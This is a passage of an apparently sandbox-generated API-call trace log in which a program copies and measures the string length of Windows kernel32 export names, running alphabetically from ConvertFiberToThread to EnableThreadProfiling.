lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.413] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.413] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.413] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.413] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.413] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.413] lstrlenA (lpString="COPYFILEA") returned 9 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.413] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.413] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.413] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.413] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.413] lstrlenA (lpString="COPYFILEW") returned 9 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.413] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.413] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.413] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.413] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.414] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.414] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.414] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.414] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.414] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.414] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.414] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.414] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.414] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.414] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.414] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.414] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.414] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.414] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.414] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.414] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.414] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.414] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.415] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.415] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.415] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.415] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.415] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.415] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.415] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.415] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.415] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.415] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.415] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.415] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.415] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.415] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.415] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.415] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.415] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.415] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.416] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.416] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.416] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.416] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.416] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.416] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.416] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.416] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.416] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.416] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.416] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.416] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.416] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.416] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.416] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.416] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.416] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.416] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.417] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.417] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.417] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.417] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.417] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.417] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.417] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.417] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.417] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.417] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.417] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.417] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.417] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.417] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.417] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.417] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.417] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.418] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.418] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.418] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.418] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.418] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.418] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.418] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.418] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.418] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.418] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.418] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.418] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.418] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.418] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.418] lstrlenA (lpString="DELETEATOM") returned 10 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.418] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.418] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.418] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.419] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.419] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.419] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.419] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.419] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.419] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.419] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.419] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.419] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.419] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.419] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.419] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.419] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.419] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.419] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.419] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.419] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.419] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.420] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.420] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.420] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.420] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.420] lstrlenA (lpString="ENABLETHREADPROFILING") 